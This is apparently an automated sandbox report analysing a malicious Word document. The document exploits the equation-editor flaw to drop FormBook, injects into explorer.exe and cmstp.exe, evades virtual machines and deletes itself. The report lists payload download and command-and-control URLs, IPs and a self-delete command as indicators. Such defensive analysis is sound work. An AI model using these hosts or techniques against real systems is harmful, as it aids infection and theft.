          Source: explorer.exe, 00000006.00000000.511664775.000000000029B000.00000004.00000020.sdmp | Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
          Source: explorer.exe, 00000006.00000000.433262826.00000000045D6000.00000004.00000001.sdmp | Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: ashlkyvc7592.exe, 00000004.00000002.425537455.000000000225D000.00000004.00000001.sdmp | Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_004088C0 rdtsc
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\cmstp.exe | Process token adjusted: Debug
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00AC26F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 7_2_020226F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\cmstp.exe | Process queried: DebugPort
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Code function: 5_2_00409B30 LdrLoadDll,
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe | Domain query: www.texaszephyr.com
          Source: C:\Windows\explorer.exe | Domain query: www.bandhancustomer.com
          Source: C:\Windows\explorer.exe | Domain query: www.publicfigure.skin
          Source: C:\Windows\explorer.exe | Network Connect: 172.67.184.102 80
          Source: C:\Windows\explorer.exe | Domain query: www.volunteervabetweenk.com
          Source: C:\Windows\explorer.exe | Domain query: www.1oavyx.com
          Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
          Sample uses process hollowing technique
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Section unmapped: C:\Windows\SysWOW64\cmstp.exe base address: 110000
          Maps a DLL or memory area into another process
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Section loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Section loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cmstp.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cmstp.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Injects a PE file into a foreign processes
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Memory written: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Thread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Thread register set: target process: 1764
          Source: C:\Windows\SysWOW64\cmstp.exe | Thread register set: target process: 1764
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe C:\Users\user\AppData\Roaming\ashlkyvc7592.exe
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Process created: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe C:\Users\user\AppData\Roaming\ashlkyvc7592.exe
          Source: C:\Windows\SysWOW64\cmstp.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Roaming\ashlkyvc7592.exe"
          Source: explorer.exe, 00000006.00000000.427630812.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.447568102.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.511801365.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.439598831.0000000000750000.00000002.00020000.sdmp, cmstp.exe, 00000007.00000002.686590550.0000000000A60000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.427421343.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.447366973.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.439424589.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.511482997.0000000000255000.00000004.00000020.sdmp | Binary or memory string: ProgmanG
          Source: explorer.exe, 00000006.00000000.427630812.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.447568102.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.511801365.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.439598831.0000000000750000.00000002.00020000.sdmp, cmstp.exe, 00000007.00000002.686590550.0000000000A60000.00000002.00020000.sdmp | Binary or memory string: !Progman
          Source: explorer.exe, 00000006.00000000.427630812.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.447568102.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.511801365.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.439598831.0000000000750000.00000002.00020000.sdmp, cmstp.exe, 00000007.00000002.686590550.0000000000A60000.00000002.00020000.sdmp | Binary or memory string: Program Manager<
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Queries volume information: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe VolumeInformation
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match | File source: 5.0.ashlkyvc7592.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.ashlkyvc7592.exe.400000.10.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.ashlkyvc7592.exe.33ebb40.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.ashlkyvc7592.exe.3393520.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.ashlkyvc7592.exe.400000.10.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.ashlkyvc7592.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.ashlkyvc7592.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.ashlkyvc7592.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.ashlkyvc7592.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000007.00000002.686456820.0000000000320000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.686315471.00000000001A0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000000.453524985.0000000009369000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000000.423949680.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.461715282.0000000000360000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000000.423661966.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000000.446630168.0000000009369000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.461694176.0000000000310000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.425827877.0000000003249000.00000004.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara match | File source: 5.0.ashlkyvc7592.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.ashlkyvc7592.exe.400000.10.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.ashlkyvc7592.exe.33ebb40.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.ashlkyvc7592.exe.3393520.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.ashlkyvc7592.exe.400000.10.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.ashlkyvc7592.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.ashlkyvc7592.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.ashlkyvc7592.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.ashlkyvc7592.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000007.00000002.686456820.0000000000320000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.686315471.00000000001A0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000000.453524985.0000000009369000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000000.423949680.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.461715282.0000000000360000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000000.423661966.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000000.446630168.0000000009369000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.461694176.0000000000310000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.425827877.0000000003249000.00000004.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Techniques per tactic (the number following a technique is the count shown next to it in the matrix):

          Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
          Execution: Shared Modules 1; Exploitation for Client Execution 13; At (Linux); At (Windows); Cron; Launchd; Scheduled Task
          Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
          Privilege Escalation: Process Injection 612; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
          Defense Evasion: Masquerading 1; Disable or Modify Tools 1; Virtualization/Sandbox Evasion 31; Process Injection 612; Deobfuscate/Decode Files or Information 1; Obfuscated Files or Information 4; Software Packing 13
          Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
          Discovery: Security Software Discovery 221; Process Discovery 2; Virtualization/Sandbox Evasion 31; Remote System Discovery 1; File and Directory Discovery 1; System Information Discovery 113; Network Sniffing
          Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
          Collection: Archive Collected Data 1; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
          Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
          Command and Control: Encrypted Channel 1; Ingress Tool Transfer 14; Non-Application Layer Protocol 3; Application Layer Protocol 123; Fallback Channels; Multiband Communication; Commonly Used Port
          Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points
          Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
          Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact

          Behavior Graph


          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
Behavior Graph ID: 528734, Sample: P.O-5433ERE.doc, Start date: 25/11/2021, Architecture: WINDOWS, Score: 100

Signatures on the root node: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 12 other signatures.

EQNEDT32.EXE (node counts: 11), started from the sample:
• DNS/IP: dell-tv.tk 37.0.9.166, port 80 (local port 49165), WKD-ASIE, Netherlands
• Dropped: C:\Users\user\AppData\...\ashlkyvc7592.exe (PE32)
• Dropped: C:\Users\user\AppData\...\ashlyzx[1].exe (PE32)
• Signature: Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
• Started: ashlkyvc7592.exe

WINWORD.EXE (node counts: 291 19), started from the sample:
• Dropped: ~WRF{3D999299-2169...1-6FEE86AD4ADA}.tmp (Composite)

ashlkyvc7592.exe (first instance):
• Signature: Tries to detect virtualization through RDTSC time measurements
• Signature: Injects a PE file into a foreign processes
• Started: ashlkyvc7592.exe (second instance)

ashlkyvc7592.exe (second instance):
• Signature: Modifies the context of a thread in another process (thread injection)
• Signature: Maps a DLL or memory area into another process
• Signature: Sample uses process hollowing technique
• Signature: Queues an APC in another process (thread injection)
• Injected: explorer.exe

explorer.exe (injected):
• DNS/IP: www.texaszephyr.com
• DNS/IP: www.volunteervabetweenk.com 172.67.184.102, port 80 (local port 49169), CLOUDFLARENETUS, United States
• DNS/IP: 6 other IPs or domains
• Signature: System process connects to network (likely due to code injection or exploit)
• Started: cmstp.exe

cmstp.exe:
• Signature: Modifies the context of a thread in another process (thread injection)
• Signature: Maps a DLL or memory area into another process
• Signature: Tries to detect virtualization through RDTSC time measurements
• Started: cmd.exe


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          No Antivirus matches

          Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{3D999299-2169-4632-82B1-6FEE86AD4ADA}.tmp | 100% | Avira | EXP/CVE-2017-11882.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{3D999299-2169-4632-82B1-6FEE86AD4ADA}.tmp | 100% | Joe Sandbox ML |

          Unpacked PE Files

Source | Detection | Scanner | Label
5.0.ashlkyvc7592.exe.400000.10.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
5.0.ashlkyvc7592.exe.400000.8.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
5.2.ashlkyvc7592.exe.400000.2.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
5.0.ashlkyvc7592.exe.400000.6.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

Source | Detection | Scanner | Label
texaszephyr.com | 0% | Virustotal |

          URLs

Source | Detection | Scanner | Label
http://wellformedweb.org/CommentAPI/ | 0% | URL Reputation | safe
http://www.texaszephyr.com/op9t/?0l=exlpTNNXh0F&c0=4uZm8lPh56XAYP0u1p0c6SVxcutgTZuNbzhe7MVeNR3LwnMhhkFBXHHvU8jy6jgZH7Gcyg== | 0% | Avira URL Cloud | safe
http://www.iis.fhg.de/audioPA | 0% | URL Reputation | safe
http://www.volunteervabetweenk.com/op9t/?0l=exlpTNNXh0F&c0=WMWbw9/24XbwIiPl+aU7TY/mYt55hlmFa8WJlEktQGdJQVklk58s/CKKr8Th7+7tz7UKpw== | 0% | Avira URL Cloud | safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
http://treyresearch.net | 0% | URL Reputation | safe
http://www.publicfigure.skin/op9t/?c0=RQ8pabDbnEWS4MHppDnLpAnnVm0R7EKmWqTB7JHuP07woLOWNs0JhuHKNBpScYVLrEmjjw==&0l=exlpTNNXh0F | 0% | Avira URL Cloud | safe
http://java.sun.com | 0% | URL Reputation | safe
http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
http://dell-tv.tk/ashlyzx.exe | 0% | Avira URL Cloud | safe
http://computername/printers/printername/.printer | 0% | Avira URL Cloud | safe
http://www.%s.comPA | 0% | URL Reputation | safe
http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe
www.fcusd4.com/op9t/ | 0% | Avira URL Cloud | safe

          Domains and IPs

          Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
dell-tv.tk | 37.0.9.166 | true | true | | unknown
publicfigure.skin | 34.102.136.180 | true | false | | unknown
www.volunteervabetweenk.com | 172.67.184.102 | true | true | | unknown
texaszephyr.com | 34.102.136.180 | true | false | | unknown
www.texaszephyr.com | unknown | unknown | true | | unknown
www.1oavyx.com | unknown | unknown | true | | unknown
www.bandhancustomer.com | unknown | unknown | true | | unknown
www.publicfigure.skin | unknown | unknown | true | | unknown

                        Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.texaszephyr.com/op9t/?0l=exlpTNNXh0F&c0=4uZm8lPh56XAYP0u1p0c6SVxcutgTZuNbzhe7MVeNR3LwnMhhkFBXHHvU8jy6jgZH7Gcyg== | false | Avira URL Cloud: safe | unknown
http://www.volunteervabetweenk.com/op9t/?0l=exlpTNNXh0F&c0=WMWbw9/24XbwIiPl+aU7TY/mYt55hlmFa8WJlEktQGdJQVklk58s/CKKr8Th7+7tz7UKpw== | true | Avira URL Cloud: safe | unknown
http://www.publicfigure.skin/op9t/?c0=RQ8pabDbnEWS4MHppDnLpAnnVm0R7EKmWqTB7JHuP07woLOWNs0JhuHKNBpScYVLrEmjjw==&0l=exlpTNNXh0F | false | Avira URL Cloud: safe | unknown
http://dell-tv.tk/ashlyzx.exe | true | Avira URL Cloud: safe | unknown
www.fcusd4.com/op9t/ | true | Avira URL Cloud: safe | low

                        URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.windows.com/pctv. | explorer.exe, 00000006.00000000.441136797.0000000002AE0000.00000002.00020000.sdmp | false | | high
http://investor.msn.com | explorer.exe, 00000006.00000000.441136797.0000000002AE0000.00000002.00020000.sdmp | false | | high
http://www.msnbc.com/news/ticker.txt | explorer.exe, 00000006.00000000.441136797.0000000002AE0000.00000002.00020000.sdmp | false | | high
http://wellformedweb.org/CommentAPI/ | explorer.exe, 00000006.00000000.516217936.0000000004650000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.451173882.0000000004650000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1 | explorer.exe, 00000006.00000000.452882159.00000000083C9000.00000004.00000001.sdmp | false | | high
http://www.iis.fhg.de/audioPA | explorer.exe, 00000006.00000000.451173882.0000000004650000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEM | explorer.exe, 00000006.00000000.451072374.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.516156334.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443806201.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.433262826.00000000045D6000.00000004.00000001.sdmp | false | | high
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | explorer.exe, 00000006.00000000.512665035.0000000002CC7000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
http://www.hotmail.com/oe | explorer.exe, 00000006.00000000.441136797.0000000002AE0000.00000002.00020000.sdmp | false | | high
http://treyresearch.net | explorer.exe, 00000006.00000000.516217936.0000000004650000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.451173882.0000000004650000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2 | explorer.exe, 00000006.00000000.442612766.0000000003DF8000.00000004.00000001.sdmp | false | | high
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | explorer.exe, 00000006.00000000.512665035.0000000002CC7000.00000002.00020000.sdmp | false | | high
http://java.sun.com | explorer.exe, 00000006.00000000.427421343.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.447366973.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.439424589.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.511482997.0000000000255000.00000004.00000020.sdmp | false | URL Reputation: safe | unknown
http://www.icra.org/vocabulary/. | explorer.exe, 00000006.00000000.512665035.0000000002CC7000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
http://www.msn.com/de-de/?ocid=iehpC | explorer.exe, 00000006.00000000.450689751.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.514669026.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.432749870.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443479778.000000000449C000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | explorer.exe, 00000006.00000000.439681149.0000000001BE0000.00000002.00020000.sdmp | false | | high
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv | explorer.exe, 00000006.00000000.450661443.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.438489061.000000000845A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.446213289.0000000008426000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.432704474.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.515608032.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.438411780.00000000083C9000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443456223.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.452882159.00000000083C9000.00000004.00000001.sdmp | false | | high
http://investor.msn.com/ | explorer.exe, 00000006.00000000.441136797.0000000002AE0000.00000002.00020000.sdmp | false | | high
http://www.msn.com/?ocid=iehp | explorer.exe, 00000006.00000000.450689751.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.514669026.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.432749870.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443479778.000000000449C000.00000004.00000001.sdmp | false | | high
http://www.msn.com/de-de/?ocid=iehp | explorer.exe, 00000006.00000000.450689751.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.514669026.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.432749870.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443479778.000000000449C000.00000004.00000001.sdmp | false | | high
http://www.piriform.com/ccleaner | explorer.exe, 00000006.00000000.450661443.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.438489061.000000000845A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443564000.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.446213289.0000000008426000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.432704474.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.450764826.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.432948850.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.515608032.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.438411780.00000000083C9000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443456223.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.452882159.00000000083C9000.00000004.00000001.sdmp | false | | high
http://computername/printers/printername/.printer | explorer.exe, 00000006.00000000.451173882.0000000004650000.00000002.00020000.sdmp | false | Avira URL Cloud: safe | low
http://www.%s.comPA | explorer.exe, 00000006.00000000.439681149.0000000001BE0000.00000002.00020000.sdmp | false | URL Reputation: safe | low
http://www.autoitscript.com/autoit3 | explorer.exe, 00000006.00000000.427421343.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.447366973.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.439424589.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.511482997.0000000000255000.00000004.00000020.sdmp | false | | high
https://support.mozilla.org | explorer.exe, 00000006.00000000.427421343.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.447366973.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.439424589.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.511482997.0000000000255000.00000004.00000020.sdmp | false | | high
http://www.msn.com/?ocid=iehp0 | explorer.exe, 00000006.00000000.450689751.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.514669026.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.432749870.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443479778.000000000449C000.00000004.00000001.sdmp | false | | high
http://servername/isapibackend.dll | explorer.exe, 00000006.00000000.442701106.0000000003E50000.00000002.00020000.sdmp, cmd.exe, 00000008.00000002.466348639.0000000001BD0000.00000002.00020000.sdmp | false | Avira URL Cloud: safe | low

                                                            Contacted IPs

                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs

                                                            Public

IP | Domain | Country | ASN | ASN Name | Malicious
172.67.184.102 | www.volunteervabetweenk.com | United States | 13335 | CLOUDFLARENETUS | true
34.102.136.180 | publicfigure.skin | United States | 15169 | GOOGLEUS | false
37.0.9.166 | dell-tv.tk | Netherlands | 198301 | WKD-ASIE | true

                                                            Private

                                                            IP
                                                            192.168.2.255

                                                            General Information

Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 528734
Start date: 25.11.2021
Start time: 18:07:48
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 10m 58s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: P.O-5433ERE.doc
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 11
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.expl.evad.winDOC@9/9@6/4
EGA Information: Failed
HDC Information:
• Successful, ratio: 22.5% (good quality ratio 21%)
• Quality average: 74.3%
• Quality standard deviation: 29.9%
HCA Information:
• Successful, ratio: 91%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .doc
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
• TCP Packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 144.91.75.9
• Excluded domains from analysis (whitelisted): sevensummitclimbing.com, www.sevensummitclimbing.com
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtQueryAttributesFile calls found.

                                                            Simulations

                                                            Behavior and APIs

Time | Type | Description
18:08:17 | API Interceptor | 179x Sleep call for process: EQNEDT32.EXE modified
18:08:24 | API Interceptor | 55x Sleep call for process: ashlkyvc7592.exe modified
18:08:45 | API Interceptor | 95x Sleep call for process: cmstp.exe modified
18:10:00 | API Interceptor | 1x Sleep call for process: explorer.exe modified

                                                            Joe Sandbox View / Context

                                                            IPs

Match | Associated Sample Name / URL | Detection | Context
37.0.9.166 | Quotation No. Q07387.doc | malicious | dell-tv.tk/templezx.exe
| Swift Copy TT.doc | malicious | dell-tv.tk/xzx.exe
| Order ID 1426095239.doc | malicious | kizitox.ga/mazx.exe
| PAYMENT2021A0087NOV.doc | malicious | kizitox.ga/chriszx.exe
| Temp Order2.exe | malicious | drossmnfg.com/stallion/index.php
| Rev_NN doccument.doc | malicious | samsung-tv.tk/hussanzx.exe
| 20211122.doc | malicious | samsung-tv.tk/famzx.exe
| PO-20212222.doc | malicious | samsung-tv.tk/obizx.exe
| BANK DETAILS.doc | malicious | kizitox.ga/mazx.exe
| 50% TT advance copy.doc | malicious | kizitox.ga/ugopoundzx.exe
